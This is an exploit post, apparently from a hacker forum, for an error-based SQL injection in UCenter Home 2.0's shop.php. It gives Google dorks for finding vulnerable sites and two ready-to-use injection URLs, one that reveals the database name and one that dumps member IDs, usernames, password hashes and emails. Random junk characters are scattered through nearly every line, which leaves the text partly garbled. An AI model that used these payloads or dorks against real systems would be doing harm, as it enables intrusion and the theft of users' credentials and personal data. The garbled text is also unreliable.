$ w a5 n2 `! X( Q+ y$ L' k__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ ; C' ^" L9 M9 w0 w: e
, m4 `! _$ s0 i# a+ A. {
; ^& x! v+ i9 Y; l4 z
$ N- y0 R( A' p+ b0 Z*/ Author : KnocKout
" z# S8 ]- v; V8 K3 a) q, a0 p5 j3 u+ U$ T& n, v* }2 G+ d
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers & e" f; S& l2 k5 ~% J" O$ Q0 B
; ]4 ~1 A4 n! C5 q( d+ R*/ Contact: knockoutr@msn.com
! ^& V7 m7 m- J9 h
- o0 o" o# n# s; Z7 O1 d) n' `6 R9 {$ Z*/ Cyber-Warrior.org/CWKnocKout
# C& y+ s+ R# S {8 R* }! b
8 {# d+ Q7 B' q: J8 U6 X4 ~__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 2 w2 f q3 K: J
5 P% a' h- [6 z6 R/ \Script : UCenter Home
; Z/ o; \! v* t% M, K; i' p G/ F
7 t, r2 `' o* k# n/ {Version : 2.0
0 ?+ E+ Q: A6 E4 k; I2 r9 j2 W6 E8 @2 `0 Q$ {+ R1 k/ d
Script HomePage : http://u.discuz.net/
" F6 K& W0 ^1 o; N" i
5 h) D c& z2 C1 k6 `__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== : q8 G5 U& ^# l5 b8 D8 \# j
H- K7 g! {8 Y9 }% a
Dork : Powered by UCenter inurl:shop.php?ac=view 6 U$ Y! G0 ]) v; y F, F" P+ f6 s$ ^1 a
) f5 `8 B; I' ]! E* dDork 2 : inurl:shop.php?ac=view&shopid= 3 U' O1 U. n' V& S" V% T* {6 j
& k/ |9 F0 `. z9 |+ e6 e i/ |
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 4 w1 q+ F y* G" {( b
: ?. |& ^$ Y3 z F* _Vuln file : Shop.php
/ F$ Y* p d. j7 [: i2 n5 I
& T& p6 q& m9 l6 m D0 i3 V% yvalue's : (?)ac=view&shopid=
" x0 m5 Q: n" ?0 \3 X* t& x: P% N
' c! |0 B0 X$ t) P* zVulnerable Style : SQL Injection (MySQL Error Based)
9 L- `' g& S; c. `( H$ c& ~6 {* ^9 @1 K
Need Metarials : Hex Conversion
# F$ t) e2 @2 @) A1 f N* E$ y. M; D- B$ k/ X
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & K( V+ y9 {$ W7 D
/ w" W3 Z# } U X+ i fYour Need victim Database name. ! H, i; k1 h5 a5 c1 Z2 v
% E( T" k. p# Z3 i2 a! p, Bfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 : p/ h. j7 M; E M j# N; J7 W
) ]1 ?" W1 A' c/ I.. 7 J( m0 m& b; u# C
& w( f$ L; t- K) s/ ?DB : Okey. & B; {/ ]& j3 i
3 S" H1 R+ M X8 Z" [- L) `3 g3 ~your edit DB `[TARGET DB NAME]`
6 @9 ?* |1 W3 d( w. y, K" h1 R1 H y
Example : 'hiwir1_ucenter'
7 Y" J: O" ?# n; @
$ J/ [* `1 B j( d% |, tEdit : Okey.
( H6 [8 k0 B0 _' C G$ Y: t9 N- u. a, `) w* ^" p9 c% j5 {
Your use Hex conversion. And edit Your SQL Injection Exploit.. ' X% \! Q7 H* `. c4 u
# W6 h5 H' x9 u0 J( Z* |* j: `0 a
, @& t) S, x& e# W! @
# t- m' H. p/ w. s
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 $ c( s/ _8 {3 M' D$ B
|